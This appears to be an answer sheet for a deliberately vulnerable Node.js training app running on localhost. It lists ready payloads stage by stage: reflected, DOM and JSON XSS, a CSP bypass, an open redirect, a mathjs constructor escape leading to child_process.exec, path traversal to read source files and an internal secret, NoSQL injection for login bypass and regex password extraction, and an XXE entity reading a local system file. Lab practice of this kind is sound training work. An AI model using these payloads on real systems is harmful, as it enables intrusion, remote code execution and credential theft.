///////////////////////
// 		  XSS
///////////////////////

1 reflection ) 		http://127.0.0.1:3000/api/xss/stage/1?search=aaaaaaa%3Cscript%3Ealert(1)%3C/script%3E
2 none reflection) 	http://127.0.0.1:3000/api/xss/stage/1?search=aaaaaaa%3Cscript%3Ealert(1)%3C/script%3E
3 ejs ) 			http://127.0.0.1:3000/XSS/stage/3?search=%22%3E%3Csvg%2Fonload%3Dalert%281%29%3E%3Cspan+id%3D%221
4 json) 			http://127.0.0.1:3000/api/xss/stage/4?search=aaaaaaaa&country=IL<svg/onload=alert(1)>
5 dom )				http://127.0.0.1:3000/XSS/stage/5#%3Cscript%3Ealert(1)%3C/script%3E
6 a href )			http://127.0.0.1:3000/XSS/stage/6?search=javascript%3Aalert%281%29

7 redirect )		http://127.0.0.1:3000/redirect?url=https://www.rzcyber.com
7 xss )				http://127.0.0.1:3000/xss/stage/7?callback=http://127.0.0.1:3000/xss/stage/7_real?search=%3Cscript%3Ealert(1)%3C/script%3E

8 csp )				alert(1);
					<script src="/uploads/first.js"></script>
///////////////////////
// 	   Known Vuln
///////////////////////

cos.constructor("return 1")()

https://jwlss.pw/mathjs/

///////////////////////
//		RCE
///////////////////////
process.cwd()
var fs=require("fs");fs.readdirSync("/app.js").toString('utf8')
require('child_process').exec('whoami')

///////////////////////
//		File Inclusion
///////////////////////
http://127.0.0.1:3000/file_inclusion/stage/1?file=../../app.js
http://127.0.0.1:3000/file_inclusion/stage/2?file=http://127.0.0.1:3000/api/secret

///////////////////////
//		NO SQLi
///////////////////////
1 login) 		{"creds":"roman","password":{"$ne":"A"}}
1 get password) {"creds":"roman","password":{"$regex":"^IKn"}}


///////////////////////
//		XXE
///////////////////////
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE r [ <!ELEMENT r ANY ><!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >]>
<creds><user>&xxe;</user><pass>asdasd</pass></creds>